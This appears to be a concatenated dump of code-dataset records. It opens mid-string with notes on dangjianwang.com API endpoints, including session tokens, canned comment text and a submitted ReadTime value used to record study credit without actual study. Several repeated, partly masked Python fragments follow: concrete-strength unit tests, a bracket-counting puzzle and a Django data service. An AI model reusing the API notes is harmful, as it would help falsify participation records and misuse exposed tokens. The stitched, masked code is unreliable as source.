学习的id列表\r\nappid\tTJZHDJ01\r\npage_size\t20\r\ntype_id\t791\r\ntoken\t5jTY47PbPZJbeh9ixjfOUvaoI3604SrSAz5Zokt3DAmfz3qIis4Yb1JCDwq_\r\npage_index\t1\r\n\r\n下面是针对791id列表中的访问地址\r\nhttps://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus\r\n\r\npost1:\r\nappid\tTJZHDJ01\r\nmid\t9729\r\ntoken\t5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_\r\npost2:\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/Login/CheckToken\r\nappid\tTJZHDJ01\r\ntoken\t5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_\r\n\r\npost3:\r\nhttps://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum\r\nappid\tTJZHDJ01\r\nmid\t9729\r\ntoken\t5jTY47PbPZoOKEUwlDCaAKWqICGwt3_OVzlVpk5yW1bMyS_M3J5Db1JCDwq_\r\n\r\nget1 https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={} 获得页面\r\n\r\n\r\n\r\npost 发表体会\r\nhttps://mapi.dangjianwang.com/v3_1/Study/RecordFeeling\r\nappid\tTJZHDJ01\r\ncontent\t 伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。\r\nmid\t9729\r\ntoken\t5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_\r\n\r\npost 结束学习 \r\nhttps://mapi.dangjianwang.com/v3_1/Study/ReadTime\r\nappid\tTJZHDJ01\r\ntime\t362\r\nmid\t9729\r\ntoken\t5jTY47PbPckOdUlllmfOCaCvcy7ls3rSVmxRoE0gDg3EmyrYi5Ucb1JCDwq_\r\n\r\n\r\n---------------------------------------\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/Help/List 这里获得帮助id\r\nhttps://mapi.dangjianwang.com/v3_1/Help/PostComment 提交评论的地址\r\n\r\n\r\nappid\tTJZHDJ01\r\ncontent\t不忘初心,牢记使命!\r\nid\t55984\r\ntoken\t5jTY47PbPcpZe0s1xDLKAqKoIimx6SnSVjcApB92DF3Nmy/djZ1Nb1JCDwq_\r\n\r\n把党的政治建设摆在首位!\r\n不忘初心,牢记使命!\r\n\r\n-------------------------------\r\n\r\n发布的内容\r\nhttps://mapi.dangjianwang.com/v3_1/Viewpoint/Create\r\n\r\nappid\tTJZHDJ01\r\ncontent\t不忘初心牢记使命\r\ntoken\t5jTY47PbPZ9deR5rkTXIB/b/fymw5HvbAj9R900gDArNnXqE1s9Kb1JCDwq_\r\n\r\n\r\n不忘初心,牢记使命,坚持终身学习!\r\n全面的小康,覆盖的人口要全面,是惠及全体人民的小康。\r\n\r\n-----------------------------\r\n点赞错误\r\n{'msg': '重复评论过多,请您修改后重新提交。', 'code': '500'}\r\n'''",
"step-ids": [
17,
19,
20,
21,
24
]
}
|
[
17,
19,
20,
21,
24
] |
<|reserved_special_token_0|>
class test(TestCase):
<|reserved_special_token_0|>
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 30000.0
As = 1017
As_ = 1017
n = 10
M = 20
N = 450
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
assert abs(r[0] - 7.56) / 7.56 < 0.01
assert abs(r[2] - 67.8) / 67.8 < 0.01
def test3(self):
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b, h0, As, n, M)
s = beam_strength.shear_stress(b, h0, As, n, V)
print('σc,σs,x = \n', r)
print('τ = ', s)
M1 = 10
M2 = 10
σs = r[1]
Es = 200000.0
d = 28
a = 62.5
n1 = As / (pi / 4 * d ** 2)
wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
print('wf = ', wf)
def test_column_strength(self):
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 34500.0
As = 12316
As_ = 12316
n = 10
M = 2800
N = 14000
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b, h0, As, n, M)
print('σc,σs,x = ', r)
assert abs(r[0] - 5.26) / 5.26 < 0.01
assert abs(r[1] - 115.3) / 115.3 < 0.01
assert abs(r[2] - 167.1) / 167.1 < 0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 30000.0
As = 1017
As_ = 1017
n = 10
M = 20
N = 450
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
assert abs(r[0] - 7.56) / 7.56 < 0.01
assert abs(r[2] - 67.8) / 67.8 < 0.01
def test3(self):
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b, h0, As, n, M)
s = beam_strength.shear_stress(b, h0, As, n, V)
print('σc,σs,x = \n', r)
print('τ = ', s)
M1 = 10
M2 = 10
σs = r[1]
Es = 200000.0
d = 28
a = 62.5
n1 = As / (pi / 4 * d ** 2)
wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
print('wf = ', wf)
def test_column_strength(self):
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 34500.0
As = 12316
As_ = 12316
n = 10
M = 2800
N = 14000
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b, h0, As, n, M)
print('σc,σs,x = ', r)
assert abs(r[0] - 5.26) / 5.26 < 0.01
assert abs(r[1] - 115.3) / 115.3 < 0.01
assert abs(r[2] - 167.1) / 167.1 < 0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 30000.0
As = 1017
As_ = 1017
n = 10
M = 20
N = 450
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
assert abs(r[0] - 7.56) / 7.56 < 0.01
assert abs(r[2] - 67.8) / 67.8 < 0.01
def test3(self):
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b, h0, As, n, M)
s = beam_strength.shear_stress(b, h0, As, n, V)
print('σc,σs,x = \n', r)
print('τ = ', s)
M1 = 10
M2 = 10
σs = r[1]
Es = 200000.0
d = 28
a = 62.5
n1 = As / (pi / 4 * d ** 2)
wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
print('wf = ', wf)
def test_column_strength(self):
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 34500.0
As = 12316
As_ = 12316
n = 10
M = 2800
N = 14000
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
import calla.test
TestCase = calla.test.TestCase
from math import pi
from calla.TB.RC_strength import *
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b, h0, As, n, M)
print('σc,σs,x = ', r)
assert abs(r[0] - 5.26) / 5.26 < 0.01
assert abs(r[1] - 115.3) / 115.3 < 0.01
assert abs(r[2] - 167.1) / 167.1 < 0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 30000.0
As = 1017
As_ = 1017
n = 10
M = 20
N = 450
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
assert abs(r[0] - 7.56) / 7.56 < 0.01
assert abs(r[2] - 67.8) / 67.8 < 0.01
def test3(self):
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b, h0, As, n, M)
s = beam_strength.shear_stress(b, h0, As, n, V)
print('σc,σs,x = \n', r)
print('τ = ', s)
M1 = 10
M2 = 10
σs = r[1]
Es = 200000.0
d = 28
a = 62.5
n1 = As / (pi / 4 * d ** 2)
wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)
print('wf = ', wf)
def test_column_strength(self):
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 34500.0
As = 12316
As_ = 12316
n = 10
M = 2800
N = 14000
r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,
N, 0)
print("σc,σs,σs'\n", r)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
import calla.test
TestCase = calla.test.TestCase
from math import pi
from calla.TB.RC_strength import *
class test(TestCase):
def test1(self):
"""
标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1
"""
b = 200
h0 = 411
As = 763
n = 15
M = 31.5
r = beam_strength.cal_σ1(b,h0,As,n,M)
print('σc,σs,x = ',r)
# 控制误差范围1%
assert abs(r[0]-5.26)/5.26<0.01
assert abs(r[1]-115.3)/115.3<0.01
assert abs(r[2]-167.1)/167.1<0.01
def test2(self):
"""
标准验证:混凝土结构基本原理答案吕晓寅版第12章
"""
b = 250
h = 350
l0 = 5
a = 40
a_ = 40
Ec = 3.0E4 #MPa
As = 1017
As_ = 1017
n = 10
M = 20 #kN
N = 450
r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
print('σc,σs,σs\'\n',r)
assert abs(r[0]-7.56)/7.56<0.01
assert abs(r[2]-67.8)/67.8<0.01
def test3(self): #随意修改测试
b = 600
h0 = 937.5
As = 3434.375
n = 10
M = 700
V = 300
r = beam_strength.cal_σ1(b,h0,As,n,M)
s = beam_strength.shear_stress(b,h0,As,n,V)
print('σc,σs,x = \n',r)
print('τ = ',s)
M1 = 10
M2 = 10
σs = r[1]
Es = 2.0E5
d = 28
a = 62.5
n1 = As/(pi/4*d**2)
wf = crack_width.solve_wf(M1,M2,M,σs,Es,d,a,b,n1)
print('wf = ',wf)
def test_column_strength(self): #随意修改测试
b = 1200
h = 1200
l0 = 5
a = 90
a_ = 90
Ec = 3.45E4 #MPa
As = 12316
As_ = 12316
n = 10
M = 2800 #kN
N = 14000
r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)
print('σc,σs,σs\'\n',r)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "acb9b6128a3432aecf3498e1d27bdff204fee0f4",
"index": 8110,
"step-1": "<mask token>\n\n\nclass test(TestCase):\n <mask token>\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass test(TestCase):\n\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n print('σc,σs,x = ', r)\n assert abs(r[0] - 5.26) / 5.26 < 0.01\n assert abs(r[1] - 115.3) / 115.3 < 0.01\n assert abs(r[2] - 167.1) / 167.1 < 0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass test(TestCase):\n\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n print('σc,σs,x = ', r)\n assert abs(r[0] - 5.26) / 5.26 < 0.01\n assert abs(r[1] - 115.3) / 115.3 < 0.01\n assert abs(r[2] - 167.1) / 167.1 < 0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nimport calla.test\nTestCase = calla.test.TestCase\nfrom math import pi\nfrom calla.TB.RC_strength import *\n\n\nclass test(TestCase):\n\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n print('σc,σs,x = ', r)\n assert abs(r[0] - 5.26) / 5.26 < 0.01\n assert abs(r[1] - 115.3) / 115.3 < 0.01\n assert abs(r[2] - 167.1) / 167.1 < 0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 30000.0\n As = 1017\n As_ = 1017\n n = 10\n M = 20\n N = 450\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n assert abs(r[0] - 7.56) / 7.56 < 0.01\n assert abs(r[2] - 67.8) / 67.8 < 0.01\n\n def test3(self):\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b, h0, As, n, M)\n s = beam_strength.shear_stress(b, h0, As, n, V)\n print('σc,σs,x = \\n', r)\n print('τ = ', s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 200000.0\n d = 28\n a = 62.5\n n1 = As / (pi / 4 * d ** 2)\n wf = crack_width.solve_wf(M1, M2, M, σs, Es, d, a, b, n1)\n print('wf = ', wf)\n\n def test_column_strength(self):\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 34500.0\n As = 12316\n As_ = 12316\n n = 10\n M = 2800\n N = 14000\n r = column_strength.solve_stress(b, h, l0, a, a_, Ec, As, As_, n, M,\n N, 0)\n print(\"σc,σs,σs'\\n\", r)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nimport calla.test\nTestCase = calla.test.TestCase\nfrom math import pi\nfrom calla.TB.RC_strength import *\n\nclass test(TestCase):\n def test1(self):\n \"\"\"\n 标准验证:铁路混凝土结构设计原理(容许应力计算法).ppt 例1\n \"\"\"\n b = 200\n h0 = 411\n As = 763\n n = 15\n M = 31.5\n r = beam_strength.cal_σ1(b,h0,As,n,M)\n print('σc,σs,x = ',r)\n # 控制误差范围1%\n assert abs(r[0]-5.26)/5.26<0.01\n assert abs(r[1]-115.3)/115.3<0.01\n assert abs(r[2]-167.1)/167.1<0.01\n\n def test2(self):\n \"\"\"\n 标准验证:混凝土结构基本原理答案吕晓寅版第12章\n \"\"\"\n b = 250\n h = 350\n l0 = 5\n a = 40\n a_ = 40\n Ec = 3.0E4 #MPa\n As = 1017\n As_ = 1017\n n = 10\n M = 20 #kN\n N = 450\n r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)\n print('σc,σs,σs\\'\\n',r)\n assert abs(r[0]-7.56)/7.56<0.01\n assert abs(r[2]-67.8)/67.8<0.01\n\n def test3(self): #随意修改测试\n b = 600\n h0 = 937.5\n As = 3434.375\n n = 10\n M = 700\n V = 300\n r = beam_strength.cal_σ1(b,h0,As,n,M)\n s = beam_strength.shear_stress(b,h0,As,n,V)\n print('σc,σs,x = \\n',r)\n print('τ = ',s)\n M1 = 10\n M2 = 10\n σs = r[1]\n Es = 2.0E5\n d = 28\n a = 62.5\n n1 = As/(pi/4*d**2)\n wf = crack_width.solve_wf(M1,M2,M,σs,Es,d,a,b,n1)\n print('wf = ',wf)\n\n def test_column_strength(self): #随意修改测试\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 3.45E4 #MPa\n As = 12316\n As_ = 12316\n n = 10\n M = 2800 #kN\n N = 14000\n r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)\n print('σc,σs,σs\\'\\n',r)\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
import sys
sys.stdin = open("input.txt", "r")
stick = input()
cnt = 0
temp =[]
for i,s in enumerate(stick):
#'('나오면 무조건 추가
if s == '(':
temp.append(s)
else:
#절단인 경우
if stick[i-1] == '(':
temp.pop()
cnt += len(temp)
#길이가 짧아 아웃
else:
temp.pop()
cnt +=1
print(cnt)
|
normal
|
{
"blob_id": "9f38148c19f0cb9522725d9eb27c91f70055cba1",
"index": 4998,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i, s in enumerate(stick):\n if s == '(':\n temp.append(s)\n elif stick[i - 1] == '(':\n temp.pop()\n cnt += len(temp)\n else:\n temp.pop()\n cnt += 1\nprint(cnt)\n",
"step-3": "<mask token>\nsys.stdin = open('input.txt', 'r')\nstick = input()\ncnt = 0\ntemp = []\nfor i, s in enumerate(stick):\n if s == '(':\n temp.append(s)\n elif stick[i - 1] == '(':\n temp.pop()\n cnt += len(temp)\n else:\n temp.pop()\n cnt += 1\nprint(cnt)\n",
"step-4": "import sys\nsys.stdin = open('input.txt', 'r')\nstick = input()\ncnt = 0\ntemp = []\nfor i, s in enumerate(stick):\n if s == '(':\n temp.append(s)\n elif stick[i - 1] == '(':\n temp.pop()\n cnt += len(temp)\n else:\n temp.pop()\n cnt += 1\nprint(cnt)\n",
"step-5": "import sys\nsys.stdin = open(\"input.txt\", \"r\")\nstick = input()\ncnt = 0\ntemp =[]\n\nfor i,s in enumerate(stick):\n #'('나오면 무조건 추가\n if s == '(':\n temp.append(s)\n \n else:\n #절단인 경우\n if stick[i-1] == '(':\n temp.pop()\n cnt += len(temp)\n\n #길이가 짧아 아웃 \n else:\n temp.pop()\n cnt +=1\n \n \nprint(cnt)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataService:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataService:
def __init__(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataService:
def __init__(self):
pass
@staticmethod
def get_all_orders():
orders = Order.objects.order_by('-order_date')
for o in orders:
o.package_names = ', '.join([p.name for p in list(o.packages.
all())])
o.delivery_date = o.deliveryinfo_set.get().delivery_date
o.delivery_charge = o.deliveryinfo_set.get().charge
return orders
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
from django.db import connection
from .models import Order
from .models import Package
from .models import DeliveryStatus
from .models import CalcParameters
class DataService:
def __init__(self):
pass
@staticmethod
def get_all_orders():
orders = Order.objects.order_by('-order_date')
# create new variables for display
for o in orders:
o.package_names = ', '.join([p.name for p in list(o.packages.all())])
o.delivery_date = o.deliveryinfo_set.get().delivery_date
o.delivery_charge = o.deliveryinfo_set.get().charge
return orders
@staticmethod
def get_all_packages():
return Package.objects.all()
@staticmethod
def get_shopping_list_details(order_ids, dish_ids=None):
"""
:param order_ids: a list of order ids as int or str. Or a single order id as int or str
:param dish_ids: Restrict shopping list to these dishes.
A list of dish ids as int or str. Or a single order id as int or str.
:return: Return shopping list for the given orders
"""
if isinstance(order_ids, str):
order_ids = [int(order_ids)]
if isinstance(order_ids, int):
order_ids = [order_ids]
if not isinstance(order_ids, list):
raise Exception('Expecting a single order id or a list of order ids. Got [{ids}]'.format(ids=order_ids))
SQL = """select
d.id dish_id,
d.name dish_name,
sum(op.package_qty) dish_qty,
sum(d.portion_count) portion_count,
i.name ingredient_name,
round(sum(di.ingredient_weight * op.package_qty), 2) total_ingredient_weight,
round(sum(di.ingredient_weight * (i.cost_price/i.measure) * op.package_qty), 2) total_cost_price
from
orders o, order_package op, package_dish pd, dish d, dish_ingredient di, ingredient i
where
o.id = op.order_id and
op.package_id = pd.package_id and
pd.dish_id = d.id and
d.id = di.dish_id and
di.ingredient_id = i.id and
o.id in ({ids})
group by d.id, d.name, i.name
order by d.name, i.name""".format(ids=','.join([str(x) for x in order_ids]))
with connection.cursor() as cursor:
cursor.execute(SQL)
rows = cursor.fetchall()
# return a list of tuples rather than a tuple of tuples
return [row for row in rows]
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
|
flexible
|
{
"blob_id": "2e66a31638eb4e619f14a29d5d3847482d207003",
"index": 3996,
"step-1": "<mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-2": "<mask token>\n\n\nclass DataService:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-3": "<mask token>\n\n\nclass DataService:\n\n def __init__(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
